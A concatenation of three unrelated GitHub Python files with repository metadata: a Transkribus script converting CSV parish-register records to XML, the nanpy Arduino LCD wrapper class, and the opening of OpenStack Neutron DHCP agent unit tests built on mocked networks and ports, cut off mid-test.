# group per page
# or per date ?
dPages= {}
for key in keylist:
keyfound=None
for field in db:
# 4: verst
if field[9] != '4':
continue
savedKey=key[:]
bandteil = key[1].split('-')
# test for ['Zimmern', '005-03', '0015-01'] 0015-01 not int
try: int(key[2])
except ValueError:
continue
if len(bandteil) == 1:
bandteil.append('0')
if field[2] =='': field[2]='0'
if field[3] =='': field[3]='0'
# print (field,bandteil,key)
if field[0] == key[0] and int(field[1]) == int(bandteil[0]) and int(field[2]) == int(bandteil[1]) and int(field[3]) == int(key[2]):
if field[4][-1] == ' ' or field[5][-1] == ' ':continue
keyfound=savedKey
pagefield=field[3]
skey =field[0].replace('-','_')
if field[2] =='0':
abpkey = "%s_%03d_%04d"%(skey,int(field[1]),int(field[3]))
else:
abpkey = "%s_%03d_%02d_%04d"%(skey,int(field[1]),int(field[2]),int(field[3]))
try:
dPages[abpkey].append(field)
except KeyError: dPages[abpkey]=[field]
continue
# except ValueError: print( 'ISSUE:',field)
rootNode= etree.Element("DOCUMENT")
refdoc = etree.ElementTree(element=rootNode)
for i,pagenum in enumerate(sorted(dPages)):
domp=etree.Element("PAGE")
# some pages may be missing
# domp.set('number',str(i+1))
# pagenum of the first record
domp.set('number',dPages[pagenum][0][3])
domp.set('pagenum',str(pagenum))
domp.set('nbrecords',str(len( dPages[pagenum])))
#year(s)
lyears = set(map(lambda x:x[11],dPages[pagenum]))
if len(lyears)==1:
domp.set('years',list(lyears)[0])
else:
domp.set('years',"%s-%s"%(list(lyears)[0],list(lyears)[1]))
# print pagenum, domp.prop('years')
rootNode.append(domp)
for lfields in dPages[pagenum]:
# print lfields
#'qapfarrei','qaband','teilband','qaseite','name','vorname','folge','ort','beruf','fkt','funktion','jahr','monat','tag','alter_jahre','alter_monate','alter_wochen','alter_tage','alter_stunden','kommentar','zusatz','num_zusatz','mkz','pdkz','benutzer'
# 0 1 2 3 4 5 6 7
record = etree.Element("RECORD")
domp.append(record)
record.set('lastname',lfields[4])
record.set('firstname',lfields[5])
record.set('role',lfields[10])
record.set('location',lfields[7])
record.set('occupation',lfields[8])
record.set('family',lfields[19])
record.set('year',lfields[11])
record.set('month',lfields[12])
record.set('day',lfields[13])
record.set('age-year',lfields[14])
record.set('age-month',lfields[15])
record.set('age-week',lfields[16])
record.set('age-day',lfields[17])
record.set('age-hour',lfields[18])
if self.outputFileName == '-':
self.outputFileName = self.inputFileName[:-3]+'xml'
# rootNode.saveFormatFileEnc(self.outputFileName, "UTF-8",True)
refdoc.write(self.outputFileName, xml_declaration=True, encoding='UTF-8',pretty_print=True)
def processKey(self,lKeys):
"""
key can have _ in the name part! S_Bayerbach_008-01_0083
"""
lFinalKey=[]
for key in lKeys:
if key[1] != '_':key = '_'+key
lk = key.split('_')
# two last elt : bandteil, (-NN), page (NNNN)
# skip the frist one: role =S, T,..
newkey= ["-".join(lk[1:-2])]
newkey.extend(lk[-2:])
# print (newkey)
lFinalKey.append(newkey)
# if len(lk) == 5:
# lFinalKey.append(['%s-%s'%(lk[1],lk[2]),lk[3],lk[4]])
# elif len(lk) == 4:
# lFinalKey.append([lk[1],lk[2],lk[3]])
return lFinalKey
def run(self):
keyfile= open(self.keylist)
# -5
lKeys= list(map(lambda x:x[:-6].strip(),keyfile.readlines()))
lKeys = self.processKey(lKeys)
print (lKeys)
db = self.loadDB(self.inputFileName,lKeys)
refxml = self.convertIntoRef(db,lKeys)
if __name__ == "__main__":
cmp = CSV2REF()
#prepare for the parsing of the command line
cmp.createCommandLineParser()
cmp.add_option("-k", '--key',dest="keylist", action="store", type="string", help="file containing the image keys")
dParams, args = cmp.parseCommandLine()
cmp.setParams(dParams)
doc = cmp.run()
print ("conversion done")
|
{
"content_hash": "c3113cbf20a16b3aee5f5be3dbfa119c",
"timestamp": "",
"source": "github",
"line_count": 233,
"max_line_length": 262,
"avg_line_length": 42.01716738197425,
"alnum_prop": 0.5229826353421859,
"repo_name": "Transkribus/TranskribusDU",
"id": "658fffa742efdf4473f45d9cf4a20473cd3e5277",
"size": "9819",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "usecases/ABP/src/ABPRefFromBigCVS.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "2140"
},
{
"name": "HTML",
"bytes": "7987"
},
{
"name": "Python",
"bytes": "3804398"
},
{
"name": "Shell",
"bytes": "2069"
}
],
"symlink_target": ""
}
|
from nanpy.arduinoboard import ArduinoObject
from nanpy.arduinoboard import arduinoobjectmethod
class Lcd(ArduinoObject):
cfg_h_name = 'USE_LiquidCrystal'
def __init__(self, pins, begin, connection=None):
'''
:param pins: [rs, enable, d4, d5, d6, d7]
:param begin: [cols, rows]
'''
ArduinoObject.__init__(self, connection=connection)
self.id = self.call('new', pins, begin)
@arduinoobjectmethod
def printString(self, value, col = None, row = None):
pass
@arduinoobjectmethod
def setCursor(self, col, row):
pass
@arduinoobjectmethod
def autoscroll(self):
pass
@arduinoobjectmethod
def noAutoscroll(self):
pass
@arduinoobjectmethod
def clear(self):
pass
@arduinoobjectmethod
def createChar(self, num, data):
pass
@arduinoobjectmethod
def write(self, data):
pass
|
{
"content_hash": "36b06ba4eda2ebf426058dbcb2985fb7",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 59,
"avg_line_length": 22.853658536585368,
"alnum_prop": 0.6221985058697972,
"repo_name": "nanpy/nanpy",
"id": "49b6b370e55c6d52808b60e580104897f41cb9af",
"size": "937",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nanpy/lcd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "125648"
}
],
"symlink_target": ""
}
|
import copy
import sys
import uuid
import eventlet
import mock
from oslo.config import cfg
import testtools
from neutron.agent.common import config
from neutron.agent import dhcp_agent
from neutron.agent.linux import dhcp
from neutron.agent.linux import interface
from neutron.common import config as common_config
from neutron.common import constants as const
from neutron.common import exceptions
from neutron.common import rpc as n_rpc
from neutron.tests import base
HOSTNAME = 'hostname'
dev_man = dhcp.DeviceManager
rpc_api = dhcp_agent.DhcpPluginApi
DEVICE_MANAGER = '%s.%s' % (dev_man.__module__, dev_man.__name__)
DHCP_PLUGIN = '%s.%s' % (rpc_api.__module__, rpc_api.__name__)
fake_tenant_id = 'aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa'
fake_subnet1_allocation_pools = dhcp.DictModel(dict(id='', start='172.9.9.2',
end='172.9.9.254'))
fake_subnet1 = dhcp.DictModel(dict(id='bbbbbbbb-bbbb-bbbb-bbbbbbbbbbbb',
network_id='12345678-1234-5678-1234567890ab',
cidr='172.9.9.0/24', enable_dhcp=True, name='',
tenant_id=fake_tenant_id,
gateway_ip='172.9.9.1', host_routes=[],
dns_nameservers=[], ip_version=4,
allocation_pools=fake_subnet1_allocation_pools))
fake_subnet2_allocation_pools = dhcp.DictModel(dict(id='', start='172.9.8.2',
end='172.9.8.254'))
fake_subnet2 = dhcp.DictModel(dict(id='dddddddd-dddd-dddd-dddddddddddd',
network_id='12345678-1234-5678-1234567890ab',
cidr='172.9.8.0/24', enable_dhcp=False, name='',
tenant_id=fake_tenant_id, gateway_ip='172.9.8.1',
host_routes=[], dns_nameservers=[], ip_version=4,
allocation_pools=fake_subnet2_allocation_pools))
fake_subnet3 = dhcp.DictModel(dict(id='bbbbbbbb-1111-2222-bbbbbbbbbbbb',
network_id='12345678-1234-5678-1234567890ab',
cidr='192.168.1.1/24', enable_dhcp=True))
fake_meta_subnet = dhcp.DictModel(dict(id='bbbbbbbb-1111-2222-bbbbbbbbbbbb',
network_id='12345678-1234-5678-1234567890ab',
cidr='169.254.169.252/30',
gateway_ip='169.254.169.253',
enable_dhcp=True))
fake_fixed_ip1 = dhcp.DictModel(dict(id='', subnet_id=fake_subnet1.id,
ip_address='172.9.9.9'))
fake_meta_fixed_ip = dhcp.DictModel(dict(id='', subnet=fake_meta_subnet,
ip_address='169.254.169.254'))
fake_allocation_pool_subnet1 = dhcp.DictModel(dict(id='', start='172.9.9.2',
end='172.9.9.254'))
fake_port1 = dhcp.DictModel(dict(id='12345678-1234-aaaa-1234567890ab',
device_id='dhcp-12345678-1234-aaaa-1234567890ab',
device_owner='',
allocation_pools=fake_subnet1_allocation_pools,
mac_address='aa:bb:cc:dd:ee:ff',
network_id='12345678-1234-5678-1234567890ab',
fixed_ips=[fake_fixed_ip1]))
fake_port2 = dhcp.DictModel(dict(id='12345678-1234-aaaa-123456789000',
device_owner='',
mac_address='aa:bb:cc:dd:ee:99',
network_id='12345678-1234-5678-1234567890ab',
fixed_ips=[]))
fake_meta_port = dhcp.DictModel(dict(id='12345678-1234-aaaa-1234567890ab',
mac_address='aa:bb:cc:dd:ee:ff',
network_id='12345678-1234-5678-1234567890ab',
device_owner=const.DEVICE_OWNER_ROUTER_INTF,
device_id='forzanapoli',
fixed_ips=[fake_meta_fixed_ip]))
fake_network = dhcp.NetModel(True, dict(id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
admin_state_up=True,
subnets=[fake_subnet1, fake_subnet2],
ports=[fake_port1]))
isolated_network = dhcp.NetModel(
True, dict(
id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
admin_state_up=True,
subnets=[fake_subnet1],
ports=[fake_port1]))
empty_network = dhcp.NetModel(
True, dict(
id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
admin_state_up=True,
subnets=[fake_subnet1],
ports=[]))
fake_meta_network = dhcp.NetModel(
True, dict(id='12345678-1234-5678-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
admin_state_up=True,
subnets=[fake_meta_subnet],
ports=[fake_meta_port]))
fake_down_network = dhcp.NetModel(
True, dict(id='12345678-dddd-dddd-1234567890ab',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
admin_state_up=False,
subnets=[],
ports=[]))
class TestDhcpAgent(base.BaseTestCase):
def setUp(self):
super(TestDhcpAgent, self).setUp()
dhcp_agent.register_options()
cfg.CONF.set_override('interface_driver',
'neutron.agent.linux.interface.NullDriver')
# disable setting up periodic state reporting
cfg.CONF.set_override('report_interval', 0, 'AGENT')
self.driver_cls_p = mock.patch(
'neutron.agent.dhcp_agent.importutils.import_class')
self.driver = mock.Mock(name='driver')
self.driver.existing_dhcp_networks.return_value = []
self.driver_cls = self.driver_cls_p.start()
self.driver_cls.return_value = self.driver
self.mock_makedirs_p = mock.patch("os.makedirs")
self.mock_makedirs = self.mock_makedirs_p.start()
def test_dhcp_agent_manager(self):
state_rpc_str = 'neutron.agent.rpc.PluginReportStateAPI'
# sync_state is needed for this test
cfg.CONF.set_override('report_interval', 1, 'AGENT')
with mock.patch.object(dhcp_agent.DhcpAgentWithStateReport,
'sync_state',
autospec=True) as mock_sync_state:
with mock.patch.object(dhcp_agent.DhcpAgentWithStateReport,
'periodic_resync',
autospec=True) as mock_periodic_resync:
with mock.patch(state_rpc_str) as state_rpc:
with mock.patch.object(sys, 'argv') as sys_argv:
sys_argv.return_value = [
'dhcp', '--config-file',
base.etcdir('neutron.conf.test')]
cfg.CONF.register_opts(dhcp_agent.DhcpAgent.OPTS)
config.register_interface_driver_opts_helper(cfg.CONF)
config.register_agent_state_opts_helper(cfg.CONF)
config.register_root_helper(cfg.CONF)
cfg.CONF.register_opts(dhcp.OPTS)
cfg.CONF.register_opts(interface.OPTS)
common_config.init(sys.argv[1:])
agent_mgr = dhcp_agent.DhcpAgentWithStateReport(
'testhost')
eventlet.greenthread.sleep(1)
agent_mgr.after_start()
mock_sync_state.assert_called_once_with(agent_mgr)
mock_periodic_resync.assert_called_once_with(agent_mgr)
state_rpc.assert_has_calls(
[mock.call(mock.ANY),
mock.call().report_state(mock.ANY, mock.ANY,
mock.ANY)])
def test_dhcp_agent_main_agent_manager(self):
logging_str = 'neutron.agent.common.config.setup_logging'
launcher_str = 'neutron.openstack.common.service.ServiceLauncher'
with mock.patch(logging_str):
with mock.patch.object(sys, 'argv') as sys_argv:
with mock.patch(launcher_str) as launcher:
sys_argv.return_value = ['dhcp', '--config-file',
base.etcdir('neutron.conf.test')]
dhcp_agent.main()
launcher.assert_has_calls(
[mock.call(), mock.call().launch_service(mock.ANY),
mock.call().wait()])
def test_run_completes_single_pass(self):
with mock.patch(DEVICE_MANAGER):
dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
attrs_to_mock = dict(
[(a, mock.DEFAULT) for a in
['sync_state', 'periodic_resync']])
with mock.patch.multiple(dhcp, **attrs_to_mock) as mocks:
dhcp.run()
mocks['sync_state'].assert_called_once_with()
mocks['periodic_resync'].assert_called_once_with()
def test_call_driver(self):
network = mock.Mock()
network.id = '1'
dhcp = dhcp_agent.DhcpAgent(cfg.CONF)
self.assertTrue(dhcp.call_driver('foo', network))
self.driver.assert_called_once_with(cfg.CONF,
mock.ANY,
'sudo',
mock.ANY,
mock.ANY)
def _test_call_driver_failure(self, exc=None,
trace_level='exception', expected_sync=True):
network = mock.Mock()
network.id = '1'
self.driver.return_value.foo.side_effect = exc or Exception
with mock.patch.object(dhcp_agent.LOG, trace_level) as log:
dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
with mock.patch.object(dhcp,
'schedule_resync') as schedule_resync:
self.assertIsNone(dhcp.call_driver('foo', network))
self.driver.assert_called_once_with(cfg.CONF,
mock.ANY,
'sudo',
mock.ANY,
mock.ANY)
self.assertEqual(log.call_count, 1)
self.assertEqual(expected_sync, schedule_resync.called)
def test_call_driver_failure(self):
self._test_call_driver_failure()
def test_call_driver_remote_error_net_not_found(self):
self._test_call_driver_failure(
exc=n_rpc.RemoteError(exc_type='NetworkNotFound'),
trace_level='warning')
def test_call_driver_network_not_found(self):
self._test_call_driver_failure(
exc=exceptions.NetworkNotFound(net_id='1'),
trace_level='warning')
def test_call_driver_conflict(self):
self._test_call_driver_failure(
exc=exceptions.Conflict(),
trace_level='warning',
expected_sync=False)
def _test_sync_state_helper(self, known_networks, active_networks):
with mock.patch(DHCP_PLUGIN) as plug:
mock_plugin = mock.Mock()
mock_plugin.get_active_networks_info.return_value = active_networks
plug.return_value = mock_plugin
dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
attrs_to_mock = dict(
[(a, mock.DEFAULT) for a in
['refresh_dhcp_helper', 'disable_dhcp_helper', 'cache']])
with mock.patch.multiple(dhcp, **attrs_to_mock) as mocks:
mocks['cache'].get_network_ids.return_value = known_networks
dhcp.sync_state()
exp_refresh = [
mock.call(net_id) for net_id in active_networks]
diff = set(known_networks) - set(active_networks)
exp_disable = [mock.call(net_id) for net_id in diff]
mocks['cache'].assert_has_calls([mock.call.get_network_ids()])
mocks['refresh_dhcp_helper'].assert_has_called(exp_refresh)
mocks['disable_dhcp_helper'].assert_has_called(exp_disable)
def test_sync_state_initial(self):
self._test_sync_state_helper([], ['a'])
def test_sync_state_same(self):
self._test_sync_state_helper(['a'], ['a'])
def test_sync_state_disabled_net(self):
self._test_sync_state_helper(['b'], ['a'])
def test_sync_state_waitall(self):
class mockNetwork():
id = '0'
admin_state_up = True
subnets = []
def __init__(self, id):
self.id = id
with mock.patch.object(dhcp_agent.eventlet.GreenPool, 'waitall') as w:
active_networks = [mockNetwork('1'), mockNetwork('2'),
mockNetwork('3'), mockNetwork('4'),
mockNetwork('5')]
known_networks = ['1', '2', '3', '4', '5']
self._test_sync_state_helper(known_networks, active_networks)
w.assert_called_once_with()
def test_sync_state_plugin_error(self):
with mock.patch(DHCP_PLUGIN) as plug:
mock_plugin = mock.Mock()
mock_plugin.get_active_networks_info.side_effect = Exception
plug.return_value = mock_plugin
with mock.patch.object(dhcp_agent.LOG, 'exception') as log:
dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
with mock.patch.object(dhcp,
'schedule_resync') as schedule_resync:
dhcp.sync_state()
self.assertTrue(log.called)
self.assertTrue(schedule_resync.called)
def test_periodic_resync(self):
dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
with mock.patch.object(dhcp_agent.eventlet, 'spawn') as spawn:
dhcp.periodic_resync()
spawn.assert_called_once_with(dhcp._periodic_resync_helper)
def test_periodoc_resync_helper(self):
with mock.patch.object(dhcp_agent.eventlet, 'sleep') as sleep:
dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
dhcp.needs_resync_reasons = ['reason1', 'reason2']
with mock.patch.object(dhcp, 'sync_state') as sync_state:
sync_state.side_effect = RuntimeError
with testtools.ExpectedException(RuntimeError):
dhcp._periodic_resync_helper()
sync_state.assert_called_once_with()
sleep.assert_called_once_with(dhcp.conf.resync_interval)
self.assertEqual(len(dhcp.needs_resync_reasons), 0)
def test_populate_cache_on_start_without_active_networks_support(self):
# emul dhcp driver that doesn't support retrieving of active networks
self.driver.existing_dhcp_networks.side_effect = NotImplementedError
with mock.patch.object(dhcp_agent.LOG, 'debug') as log:
dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
self.driver.existing_dhcp_networks.assert_called_once_with(
dhcp.conf,
cfg.CONF.root_helper
)
self.assertFalse(dhcp.cache.get_network_ids())
self.assertTrue(log.called)
def test_populate_cache_on_start(self):
networks = ['aaa', 'bbb']
self.driver.existing_dhcp_networks.return_value = networks
dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
self.driver.existing_dhcp_networks.assert_called_once_with(
dhcp.conf,
cfg.CONF.root_helper
)
self.assertEqual(set(networks), set(dhcp.cache.get_network_ids()))
def test_none_interface_driver(self):
cfg.CONF.set_override('interface_driver', None)
with mock.patch.object(dhcp, 'LOG') as log:
self.assertRaises(SystemExit, dhcp.DeviceManager,
cfg.CONF, 'sudo', None)
msg = 'An interface driver must be specified'
log.error.assert_called_once_with(msg)
def test_nonexistent_interface_driver(self):
# Temporarily turn off mock, so could use the real import_class
# to import interface_driver.
self.driver_cls_p.stop()
self.addCleanup(self.driver_cls_p.start)
cfg.CONF.set_override('interface_driver', 'foo')
with mock.patch.object(dhcp, 'LOG') as log:
self.assertRaises(SystemExit, dhcp.DeviceManager,
cfg.CONF, 'sudo', None)
self.assertEqual(log.error.call_count, 1)
class TestLogArgs(base.BaseTestCase):
def test_log_args_without_log_dir_and_file(self):
conf_dict = {'debug': True,
'verbose': False,
'log_dir': None,
'log_file': None,
'use_syslog': True,
'syslog_log_facility': 'LOG_USER'}
conf = dhcp.DictModel(conf_dict)
expected_args = ['--debug',
'--use-syslog',
'--syslog-log-facility=LOG_USER']
args = config.get_log_args(conf, 'log_file_name')
self.assertEqual(expected_args, args)
def test_log_args_without_log_file(self):
conf_dict = {'debug': True,
'verbose': True,
'log_dir': '/etc/tests',
'log_file': None,
'use_syslog': False,
'syslog_log_facility': 'LOG_USER'}
conf = dhcp.DictModel(conf_dict)
expected_args = ['--debug',
'--verbose',
'--log-file=log_file_name',
'--log-dir=/etc/tests']
args = config.get_log_args(conf, 'log_file_name')
self.assertEqual(expected_args, args)
def test_log_args_with_log_dir_and_file(self):
conf_dict = {'debug': True,
'verbose': False,
'log_dir': '/etc/tests',
'log_file': 'tests/filelog',
'use_syslog': False,
'syslog_log_facility': 'LOG_USER'}
conf = dhcp.DictModel(conf_dict)
expected_args = ['--debug',
'--log-file=log_file_name',
'--log-dir=/etc/tests/tests']
args = config.get_log_args(conf, 'log_file_name')
self.assertEqual(expected_args, args)
def test_log_args_without_log_dir(self):
conf_dict = {'debug': True,
'verbose': False,
'log_file': 'tests/filelog',
'log_dir': None,
'use_syslog': False,
'syslog_log_facility': 'LOG_USER'}
conf = dhcp.DictModel(conf_dict)
expected_args = ['--debug',
'--log-file=log_file_name',
'--log-dir=tests']
args = config.get_log_args(conf, 'log_file_name')
self.assertEqual(expected_args, args)
def test_log_args_with_filelog_and_syslog(self):
conf_dict = {'debug': True,
'verbose': True,
'log_file': 'tests/filelog',
'log_dir': '/etc/tests',
'use_syslog': True,
'syslog_log_facility': 'LOG_USER'}
conf = dhcp.DictModel(conf_dict)
expected_args = ['--debug',
'--verbose',
'--log-file=log_file_name',
'--log-dir=/etc/tests/tests']
args = config.get_log_args(conf, 'log_file_name')
self.assertEqual(expected_args, args)
class TestDhcpAgentEventHandler(base.BaseTestCase):
def setUp(self):
super(TestDhcpAgentEventHandler, self).setUp()
config.register_interface_driver_opts_helper(cfg.CONF)
cfg.CONF.register_opts(dhcp.OPTS)
cfg.CONF.set_override('interface_driver',
'neutron.agent.linux.interface.NullDriver')
config.register_root_helper(cfg.CONF)
cfg.CONF.register_opts(dhcp_agent.DhcpAgent.OPTS)
self.plugin_p = mock.patch(DHCP_PLUGIN)
plugin_cls = self.plugin_p.start()
self.plugin = mock.Mock()
plugin_cls.return_value = self.plugin
self.cache_p = mock.patch('neutron.agent.dhcp_agent.NetworkCache')
cache_cls = self.cache_p.start()
self.cache = mock.Mock()
cache_cls.return_value = self.cache
self.mock_makedirs_p = mock.patch("os.makedirs")
self.mock_makedirs = self.mock_makedirs_p.start()
self.mock_init_p = mock.patch('neutron.agent.dhcp_agent.'
'DhcpAgent._populate_networks_cache')
self.mock_init = self.mock_init_p.start()
with mock.patch.object(dhcp.Dnsmasq,
'check_version') as check_v:
check_v.return_value = dhcp.Dnsmasq.MINIMUM_VERSION
self.dhcp = dhcp_agent.DhcpAgent(HOSTNAME)
self.call_driver_p = mock.patch.object(self.dhcp, 'call_driver')
self.call_driver = self.call_driver_p.start()
self.schedule_resync_p = mock.patch.object(self.dhcp,
'schedule_resync')
self.schedule_resync = self.schedule_resync_p.start()
self.external_process_p = mock.patch(
'neutron.agent.linux.external_process.ProcessManager'
)
self.external_process = self.external_process_p.start()
def _enable_dhcp_helper(self, network, enable_isolated_metadata=False,
is_isolated_network=False):
if enable_isolated_metadata:
cfg.CONF.set_override('enable_isolated_metadata', True)
self.plugin.get_network_info.return_value = network
self.dhcp.enable_dhcp_helper(network.id)
self.plugin.assert_has_calls(
[mock.call.get_network_info(network.id)])
self.call_driver.assert_called_once_with('enable', network)
self.cache.assert_has_calls([mock.call.put(network)])
if is_isolated_network:
self.external_process.assert_has_calls([
mock.call(
cfg.CONF,
'12345678-1234-5678-1234567890ab',
'sudo',
'qdhcp-12345678-1234-5678-1234567890ab'),
mock.call().enable(mock.ANY)
])
else:
self.assertFalse(self.external_process.call_count)
def test_enable_dhcp_helper_enable_metadata_isolated_network(self):
self._enable_dhcp_helper(isolated_network,
enable_isolated_metadata=True,
is_isolated_network=True)
def test_enable_dhcp_helper_enable_metadata_no_gateway(self):
isolated_network_no_gateway = copy.deepcopy(isolated_network)
isolated_network_no_gateway.subnets[0].gateway_ip = None
self._enable_dhcp_helper(isolated_network_no_gateway,
enable_isolated_metadata=True,
is_isolated_network=True)
def test_enable_dhcp_helper_enable_metadata_nonisolated_network(self):
nonisolated_network = copy.deepcopy(isolated_network)
nonisolated_network.ports[0].device_owner = "network:router_interface"
nonisolated_network.ports[0].fixed_ips[0].ip_address = '172.9.9.1'
self._enable_dhcp_helper(nonisolated_network,
enable_isolated_metadata=True,
is_isolated_network=False)
def test_enable_dhcp_helper_enable_metadata_empty_network(self):
self._enable_dhcp_helper(empty_network,
enable_isolated_metadata=True,
is_isolated_network=True)
def test_enable_dhcp_helper(self):
self._enable_dhcp_helper(fake_network)
def test_enable_dhcp_helper_down_network(self):
self.plugin.get_network_info.return_value = fake_down_network
self.dhcp.enable_dhcp_helper(fake_down_network.id)
self.plugin.assert_has_calls(
[mock.call.get_network_info(fake_down_network.id)])
self.assertFalse(self.call_driver.called)
self.assertFalse(self.cache.called)
self.assertFalse(self.external_process.called)
def test_enable_dhcp_helper_network_none(self):
self.plugin.get_network_info.return_value = None
with mock.patch.object(dhcp_agent.LOG, 'warn') as log:
self.dhcp.enable_dhcp_helper('fake_id')
self.plugin.assert_has_calls(
[mock.call.get_network_info('fake_id')])
self.assertFalse(self.call_driver.called)
self.assertTrue(log.called)
self.assertFalse(self.dhcp.schedule_resync.called)
def test_enable_dhcp_helper_exception_during_rpc(self):
self.plugin.get_network_info.side_effect = Exception
with mock.patch.object(dhcp_agent.LOG, 'exception') as log:
self.dhcp.enable_dhcp_helper(fake_network.id)
self.plugin.assert_has_calls(
[mock.call.get_network_info(fake_network.id)])
self.assertFalse(self.call_driver.called)
self.assertTrue(log.called)
self.assertTrue(self.schedule_resync.called)
self.assertFalse(self.cache.called)
self.assertFalse(self.external_process.called)
def test_enable_dhcp_helper_driver_failure(self):
self.plugin.get_network_info.return_value = fake_network
self.call_driver.return_value = False
self.dhcp.enable_dhcp_helper(fake_network.id)
self.plugin.assert_has_calls(
[mock.call.get_network_info(fake_network.id)])
self.call_driver.assert_called_once_with('enable', fake_network)
self.assertFalse(self.cache.called)
self.assertFalse(self.external_process.called)
def _disable_dhcp_helper_known_network(self, isolated_metadata=False):
if isolated_metadata:
cfg.CONF.set_override('enable_isolated_metadata', True)
self.cache.get_network_by_id.return_value = fake_network
self.dhcp.disable_dhcp_helper(fake_network.id)
self.cache.assert_has_calls(
[mock.call.get_network_by_id(fake_network.id)])
self.call_driver.assert_called_once_with('disable', fake_network)
if isolated_metadata:
self.external_process.assert_has_calls([
mock.call(
cfg.CONF,
'12345678-1234-5678-1234567890ab',
'sudo',
'qdhcp-12345678-1234-5678-1234567890ab'),
mock.call().disable()
])
else:
self.assertFalse(self.external_process.call_count)
def test_disable_dhcp_helper_known_network_isolated_metadata(self):
self._disable_dhcp_helper_known_network(isolated_metadata=True)
def test_disable_dhcp_helper_known_network(self):
self._disable_dhcp_helper_known_network()
def test_disable_dhcp_helper_unknown_network(self):
self.cache.get_network_by_id.return_value = None
self.dhcp.disable_dhcp_helper('abcdef')
self.cache.assert_has_calls(
[mock.call.get_network_by_id('abcdef')])
self.assertEqual(0, self.call_driver.call_count)
self.assertFalse(self.external_process.called)
def _disable_dhcp_helper_driver_failure(self, isolated_metadata=False):
if isolated_metadata:
cfg.CONF.set_override('enable_isolated_metadata', True)
self.cache.get_network_by_id.return_value = fake_network
self.call_driver.return_value = False
self.dhcp.disable_dhcp_helper(fake_network.id)
self.cache.assert_has_calls(
[mock.call.get_network_by_id(fake_network.id)])
self.call_driver.assert_called_once_with('disable', fake_network)
self.cache.assert_has_calls(
[mock.call.get_network_by_id(fake_network.id)])
if isolated_metadata:
self.external_process.assert_has_calls([
mock.call(
cfg.CONF,
'12345678-1234-5678-1234567890ab',
'sudo',
'qdhcp-12345678-1234-5678-1234567890ab'),
mock.call().disable()
])
else:
self.assertFalse(self.external_process.call_count)
def test_disable_dhcp_helper_driver_failure_isolated_metadata(self):
self._disable_dhcp_helper_driver_failure(isolated_metadata=True)
def test_disable_dhcp_helper_driver_failure(self):
self._disable_dhcp_helper_driver_failure()
def test_enable_isolated_metadata_proxy(self):
class_path = 'neutron.agent.linux.external_process.ProcessManager'
with mock.patch(class_path) as ext_process:
self.dhcp.enable_isolated_metadata_proxy(fake_network)
ext_process.assert_has_calls([
mock.call(
cfg.CONF,
'12345678-1234-5678-1234567890ab',
'sudo',
'qdhcp-12345678-1234-5678-1234567890ab'),
mock.call().enable(mock.ANY)
])
def test_disable_isolated_metadata_proxy(self):
class_path = 'neutron.agent.linux.external_process.ProcessManager'
with mock.patch(class_path) as ext_process:
self.dhcp.disable_isolated_metadata_proxy(fake_network)
ext_process.assert_has_calls([
mock.call(
cfg.CONF,
'12345678-1234-5678-1234567890ab',
'sudo',
'qdhcp-12345678-1234-5678-1234567890ab'),
mock.call().disable()
])
def test_enable_isolated_metadata_proxy_with_metadata_network(self):
cfg.CONF.set_override('enable_metadata_network', True)
cfg.CONF.set_override('debug', True)
cfg.CONF.set_override('verbose', False)
cfg.CONF.set_override('log_file', 'test.log')
class_path = 'neutron.agent.linux.ip_lib.IPWrapper'
self.external_process_p.stop()
# Ensure the mock is restored if this test fail
try:
with mock.patch(class_path) as ip_wrapper:
self.dhcp.enable_isolated_metadata_proxy(fake_meta_network)
ip_wrapper.assert_has_calls([mock.call(
'sudo',
'qdhcp-12345678-1234-5678-1234567890ab'),
mock.call().netns.execute([
'neutron-ns-metadata-proxy',
mock.ANY,
mock.ANY,
'--router_id=forzanapoli',
mock.ANY,
mock.ANY,
'--debug',
('--log-file=neutron-ns-metadata-proxy-%s.log' %
fake_meta_network.id)], addl_env=None)
])
finally:
self.external_process_p.start()
def test_network_create_end(self):
payload = dict(network=dict(id=fake_network.id))
with mock.patch.object(self.dhcp, 'enable_dhcp_helper') as enable:
self.dhcp.network_create_end(None, payload)
enable.assertCalledOnceWith(fake_network.id)
def test_network_update_end_admin_state_up(self):
payload = dict(network=dict(id=fake_network.id, admin_state_up=True))
with mock.patch.object(self.dhcp, 'enable_dhcp_helper') as enable:
self.dhcp.network_update_end(None, payload)
enable.assertCalledOnceWith(fake_network.id)
def test_network_update_end_admin_state_down(self):
payload = dict(network=dict(id=fake_network.id, admin_state_up=False))
with mock.patch.object(self.dhcp, 'disable_dhcp_helper') as disable:
self.dhcp.network_update_end(None, payload)
disable.assertCalledOnceWith(fake_network.id)
def test_network_delete_end(self):
payload = dict(network_id=fake_network.id)
with mock.patch.object(self.dhcp, 'disable_dhcp_helper') as disable:
self.dhcp.network_delete_end(None, payload)
disable.assertCalledOnceWith(fake_network.id)
def test_refresh_dhcp_helper_no_dhcp_enabled_networks(self):
network = dhcp.NetModel(True, dict(id='net-id',
tenant_id='aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa',
admin_state_up=True,
subnets=[],
ports=[]))
self.cache.get_network_by_id.return_value = network
self.plugin.get_network_info.return_value = network
with mock.patch.object(self.dhcp, 'disable_dhcp_helper') as disable:
self.dhcp.refresh_dhcp_helper(network.id)
